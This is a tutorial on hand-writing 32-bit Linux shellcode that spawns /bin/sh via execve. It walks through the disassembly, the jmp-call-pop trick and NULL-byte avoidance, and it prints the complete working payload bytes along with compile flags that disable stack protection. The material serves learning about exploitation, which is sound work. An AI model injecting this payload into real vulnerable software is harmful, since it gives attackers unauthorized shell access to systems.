In this article I’ll walk through the entire process of writing shellcode for Linux. Writing your own shellcode is considered by some to be a sort of black magic, so I thought I’d make it less murky with a comprehensive write-up on shellcode that spawns a shell. I’ll be working on 64-bit Ubuntu 15.10. However, in order to better explain the process, I’ll be working with 32-bit binaries and x86 assembly. Bear in mind that the addresses (as seen in the disassembled code etc.) will most likely be different on your computer, but the procedure will remain the same as I have explained.
What is shellcode?
“Shellcode” to a beginner in the field of information security is just a bunch of ‘\x**’ characters tied together, which make no sense whatsoever. For instance,
\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68 is a seemingly unassuming piece of shellcode which, when executed, will spawn a shell with the permissions of the process running it. If a hacker is somehow able to have this small piece of code executed in commonly used software, he could easily become a millionaire for having found his own zero-day exploit. However, it’s not that easy. A lot of constraints come into play (for instance, the length of the shellcode), so it is essential to know how to write and customize your own shellcode.
Syscalls are the means by which user mode interacts with kernel mode in order to perform operating-system-specific operations such as I/O, executing a program, exiting a process, reading/writing files etc. Each syscall has a particular number associated with it. To make a syscall on 32-bit x86 Linux, the syscall number is first loaded into the eax register, the syscall parameters are loaded into other registers, and finally the interrupt instruction int 0x80 is executed. The CPU then switches to kernel mode and executes the syscall function.
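To make the idea of a numbered syscall concrete, here is a minimal C sketch that asks the kernel for our process ID by syscall number, going through the libc syscall() wrapper instead of loading registers by hand. The helper name raw_getpid is made up for illustration. Treat it as a stand-in for int 0x80 rather than the real thing: on a 64-bit build the wrapper uses a different entry instruction and different numbers (execve is 11 on 32-bit x86 but 59 on x86-64), which is why the sketch relies on the SYS_* constants.

```c
#define _GNU_SOURCE          /* exposes syscall() in <unistd.h> on glibc */
#include <sys/syscall.h>     /* SYS_getpid and the other syscall numbers */
#include <unistd.h>

/* Hypothetical helper: invoke the getpid syscall by its number.
 * The wrapper places the number and arguments in the registers
 * the kernel expects and then traps into kernel mode. */
long raw_getpid(void)
{
    return syscall(SYS_getpid);
}
```

Calling raw_getpid() should give the same value as the ordinary getpid() library function, since both end up in the same kernel routine.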
Let us start by writing a C program to spawn a shell. We’ll be executing /bin/sh using execve(). The man page of execve() gives its prototype as int execve(const char *filename, char *const argv[], char *const envp[]).
So we’ll need to pass the filename “/bin/sh” and argv, which is an array of argument strings whose first string is “/bin/sh” (the filename we want to execute). We require no other arguments, so we’ll terminate this array with NULL. We won’t be passing any envp strings.
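A minimal sketch of such a call, under the assumptions just described (argv holds only the program path followed by NULL, and envp is NULL). The function name exec_program is hypothetical, and the path is taken as a parameter so the same code can be tried with something other than a shell.

```c
#include <stddef.h>
#include <unistd.h>

/* Hypothetical helper: replace the current process image with `path`.
 * On success execve() never returns; on failure it returns -1. */
int exec_program(const char *path)
{
    /* argv[0] is the program itself, NULL terminates the array */
    char *argv[] = { (char *)path, NULL };

    /* envp is NULL: no environment strings are passed (accepted on Linux) */
    return execve(path, argv, NULL);
}
```

Calling exec_program("/bin/sh") from main() would turn the process into a shell; with a path that does not exist, the call simply returns -1.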
Here is the program:
Let’s see if it works. We compile and run the program. And yes, we get a shell.
Thus our code works.
Understanding execve() disassembly
Now let’s take a look at a disassembly of the execve function. To do that we’ll compile our program with the -static option of gcc (i.e. gcc shell.c -o shell -m32 -static) in order to prevent dynamic linking, which allows us to examine the instructions of execve() using objdump -d shell. I have removed the portions of the disassembled code that are not important to us right now.
Let’s try to understand what some of these instructions do.
This copies the address of “/bin/sh” to memory:
8048bd8: c7 45 ec c8 bf 0b 08 movl $0x80bbfc8,-0x14(%ebp)
This copies the NULL value to the adjacent memory location:
8048bdf: c7 45 f0 00 00 00 00 movl $0x0,-0x10(%ebp)
Now the address of “/bin/sh” is copied to the eax register from the memory:
8048be6: 8b 45 ec mov -0x14(%ebp),%eax
Now the parameters are pushed onto the stack in reverse order, starting from NULL:
Next, the argv parameter, which is again the address of the getshell array, is first copied to the edx register, then pushed onto the stack:
Finally, the address of filename (“/bin/sh”), which had been stored in the eax register, is pushed onto the stack and execve() is called.
Now all execve() has to do is set up the registers and make the syscall. Let’s see how it does that. First it loads envp (NULL in our case) into edx, then the address of our getshell array into ecx, and then the address of “/bin/sh” into ebx.
Finally, it places the syscall number of execve (which is 11 or 0xb) into eax, and triggers the software interrupt.
Writing your own shellcode
Now that we understand how the call to execve() is done, let’s start writing our own shellcode. We’ll be writing it in Intel syntax. We’ll have to take care of two things though:
Our shellcode must not contain hardcoded addresses, since we don’t want shellcode which might not work on other Linux systems or in other vulnerable programs.
Our shellcode must not contain \x00 bytes, as these are used to terminate a string. Most likely, our shellcode will be placed in some sort of string buffer, and a string copy would stop at the first \x00 byte, so the instructions after it would never make it into the buffer.
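The second constraint is easy to see in a small C sketch. The helper name bytes_surviving_strcpy is made up, and the 128-byte buffer is an arbitrary assumption. It copies a payload with strcpy() and reports how many bytes actually arrived.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy `payload` the way a vulnerable program might
 * (with strcpy) and return how many bytes made it into the buffer.
 * `payload` must be NUL-terminated, as any C string literal is. */
size_t bytes_surviving_strcpy(const char *payload)
{
    char dest[128];

    if (strlen(payload) >= sizeof dest)
        return 0;                 /* refuse anything that would overflow */

    strcpy(dest, payload);        /* stops at the first \x00 byte */
    return strlen(dest);
}
```

For example, the bytes \xb8\x0b\x00\x00\x00\xcd\x80 (mov eax, 0xb followed by int 0x80) lose everything after the second byte, so the int 0x80 never reaches the buffer.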
Now let’s design how the pseudo assembly code must look so that we don’t have hardcoded addresses. We’ll have to somehow store the base address of the shellcode and use relative addressing thereafter. A common trick to accomplish this is to start our shellcode with a jmp to a call instruction placed at the end, right before our string. The call jumps back to the actual shellcode, and when it is executed it automatically pushes the address of whatever follows it (here, our string) onto the stack as the return address. Here’s what the pseudocode looks like:
First, execution jumps to callShellcode. From callShellcode the call to shellcode is made. This call stores the address of the string “/bin/shNAAAABBBB” on the stack. We have used the string “/bin/shNAAAABBBB” instead of “/bin/sh” because we also need some memory locations from which we can load the parameters of the execve call into the registers.
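Both the jmp and the call use relative displacements, which is what keeps the code free of hardcoded addresses. As a worked example, here is a small C sketch (the function name rel_target is hypothetical) that computes where a relative branch lands. The offsets used below are read off the final shellcode bytes quoted in this article: \xeb\x18 at offset 0 and \xe8\xe3\xff\xff\xff at offset 26.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: a relative jmp/call lands at
 *   (offset of the instruction) + (its length) + (signed displacement),
 * i.e. the displacement is counted from the end of the instruction. */
size_t rel_target(size_t insn_offset, size_t insn_len, int32_t disp)
{
    return (size_t)((int64_t)insn_offset + (int64_t)insn_len + disp);
}
```

With these numbers, rel_target(0, 2, 0x18) is 26, the offset of the call, and rel_target(26, 5, -29) is 2, the first instruction after the jmp (the bytes e3 ff ff ff are -29 as a little-endian 32-bit value). The return address pushed by the call is offset 31, exactly where “/bin/sh” begins.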
Now let’s start writing the contents of the shellcode. First of all, we’ll store the address of the first byte of the string “/bin/shNAAAABBBB” in esi by popping it off the stack (pop esi).
Next we’ll clear out eax by XORing it with itself.
xor eax, eax
Next we’ll NULL-terminate the “/bin/sh” string. We also do this so that we can use the same address for our argv array, whose contents are “/bin/sh” followed by NULL. The eax register has been filled with zeros by our previous instruction. The al register is an 8-bit register within eax, which is therefore zero too. We’ll copy the value of al over the ‘N’ character in the string “/bin/shNAAAABBBB”. The offset of ‘N’ from the start of the string is 7. Therefore, our instruction will be:
mov [esi + 7], al
Next we’ll be loading the address of our string “/bin/sh” into the ebx register. We can do it in 2 ways, using:
mov ebx, esi
lea ebx, [esi]
Since both these instructions amount to 2 bytes (\x89\xf3 and \x8d\x1e respectively), it won’t make any difference to the length of the shellcode.
Next we’ll be loading the address of the argv array into ecx. Bear in mind, it’s the address of an array of strings, so it is a pointer to a pointer. We’ll first need to copy the address of the string “/bin/sh” (now held in ebx) to a memory location, where it becomes argv[0]. Next, we’ll load the address of this memory location into the ecx register. The memory location we’ll be using is the location of ‘AAAA’ in our string “/bin/shNAAAABBBB”.
Next we’ll be loading the address of four NULL bytes into the edx register. We’ll first copy 4 NULL bytes from the eax register to the memory location of ‘BBBB’ in our initial string “/bin/shNAAAABBBB”. Then, we’ll load the address of this memory location into the edx register. Since ‘BBBB’ directly follows ‘AAAA’, these NULL bytes also act as the NULL entry that terminates argv.
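The memory layout these steps produce can be modelled in plain C. The sketch below is only a simulation under stated assumptions: struct regs and patch_string are made-up names, and base is an invented 32-bit address standing in for whatever esi holds at run time. The instructions in the comments are decoded from the final shellcode bytes quoted in this article.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical model of the three argument registers for execve. */
struct regs { uint32_t ebx, ecx, edx; };

/* Apply the shellcode's writes to a 16-byte copy of "/bin/shNAAAABBBB"
 * that is assumed to live at the 32-bit address `base`. */
struct regs patch_string(unsigned char buf[16], uint32_t base)
{
    struct regs r;

    buf[7] = 0;                            /* mov [esi + 7], al : 'N' -> NUL  */
    r.ebx = base;                          /* lea ebx, [esi]    : filename    */

    for (int i = 0; i < 4; i++)            /* mov [esi + 8], ebx : argv[0],   */
        buf[8 + i] = (unsigned char)(base >> (8 * i));  /* little-endian      */
    r.ecx = base + 8;                      /* lea ecx, [esi + 8] : argv       */

    memset(buf + 12, 0, 4);                /* mov [esi + 12], eax : 4 NULs    */
    r.edx = base + 12;                     /* lea edx, [esi + 12] : envp      */
    return r;
}
```

After the call, the buffer reads as the string “/bin/sh”, followed by a pointer back to that string, followed by four zero bytes, and the three registers point at offsets 0, 8 and 12 respectively.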
Finally, we’ll load the syscall number (11 or 0xb) into the eax register. However, if we move it into the full eax register, the instruction encodes 0xb as a 32-bit immediate, so the resulting shellcode will contain some NULL (\x00) bytes, and we don’t want that. Our eax register is already zero, so we’ll just load the syscall number into the al register instead of the entire eax register. Finally, we’ll trigger the software interrupt.
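The difference between the two encodings can be checked mechanically. The sketch below uses a made-up helper, first_null_byte, to scan a sequence of opcode bytes for \x00. The two byte sequences mentioned afterwards are the standard encodings of mov eax, 0xb (b8 0b 00 00 00) and mov al, 0xb (b0 0b).

```c
#include <stddef.h>

/* Hypothetical helper: return the index of the first \x00 byte in `code`,
 * or -1 if the sequence is free of NULL bytes. */
long first_null_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            return (long)i;
    }
    return -1;
}
```

Run on b8 0b 00 00 00 it reports index 2, the first padding byte of the 32-bit immediate, while b0 0b comes back as -1 because the 8-bit form carries only the single byte 0x0b.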
The entire assembly code would now look like:
Now let’s assemble this code with nasm into an ELF object file. The last step is running the ld command, which, according to its man page, “combines a number of object and archive files, relocates their data and ties up symbol references”. Thus we finally have our executable ready.
Let’s take a look at its disassembly.
In order to get the shellcode from this disassembly, we can use a small bash script:
We get the shellcode output as
\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42. Our shellcode does not contain any \x00 bytes or any hardcoded addresses.
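The formatting half of that extraction step can also be sketched in C, assuming the raw opcode bytes have already been collected into an array. The function name format_escaped is hypothetical, and this is an illustration of the output format rather than a replacement for the bash script.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: write `len` bytes into `out` as "\xNN" escapes.
 * Returns 0 on success, or -1 if `out` cannot hold 4 characters per byte
 * plus the terminating NUL. */
int format_escaped(const unsigned char *bytes, size_t len,
                   char *out, size_t out_size)
{
    if (out_size < len * 4 + 1)
        return -1;

    for (size_t i = 0; i < len; i++)
        snprintf(out + i * 4, 5, "\\x%02x", bytes[i]);   /* 4 chars + NUL */

    out[len * 4] = '\0';
    return 0;
}
```

Feeding it the bytes 0xeb, 0x18, 0x5e yields the text \xeb\x18\x5e, matching the start of the shellcode above.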
Let’s try running this shellcode through a C program.
We’ll compile the C file with the following options:
-m32: because our shellcode is for 32 bit systems only.
-fno-stack-protector: This disables the canary stack protection.
-z execstack: This makes the stack executable by disabling the NX protection.
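A minimal sketch of such a test harness follows; it is an assumption about how the test could be written, not necessarily the program used here. The function name run_shellcode is made up. The bytes are copied into a local array first, because the shellcode writes into its own trailing string and because -z execstack is only guaranteed to make the stack itself executable.

```c
#include <string.h>

/* The 47 shellcode bytes from above; the trailing string is written
 * as plain text instead of hex escapes. */
static const unsigned char shellcode[] =
    "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08"
    "\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff"
    "/bin/shNAAAABBBB";

/* Hypothetical helper: copy the shellcode onto the stack and jump to it.
 * Only meaningful in a 32-bit binary built with the options listed above. */
void run_shellcode(void)
{
    unsigned char buf[sizeof shellcode];

    memcpy(buf, shellcode, sizeof shellcode);   /* writable, on the stack */
    ((void (*)(void))buf)();                    /* treat the bytes as code */
}
```

Calling run_shellcode() from main() in a binary built with gcc -m32 -fno-stack-protector -z execstack is the intended use; in a 64-bit build the function should not be called.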
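And Voila! We spawned a shell. Our shellcode is now ready to be put into action in some vulnerable programs. We can sometimes omit the ‘NAAAABBBB’ part in order to shorten our shellcode. This works only when the nine bytes that follow the shellcode in memory are writable and can safely be overwritten, since the code still writes to them. The shortened shellcode then becomes the 38-byte sequence shown at the start of this article.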
The entire process of writing shellcode is a long and tedious one, requiring a lot of patience. However, learning to write shellcode helps in understanding a lot of concepts, and hopefully I was able to help the readers with that. If you have any questions, ask in the comments down below. Also, please correct me if I have been wrong anywhere.
About the author
I am Paras Chetal, an undergraduate student at IIT Roorkee currently pursuing a Bachelor of Technology in Computer Science and Engineering, who is passionate about information security, networking and software development. I also regularly participate in CTFs, practice wargames and develop tools and software related to the field of cyber security, all ethically of course.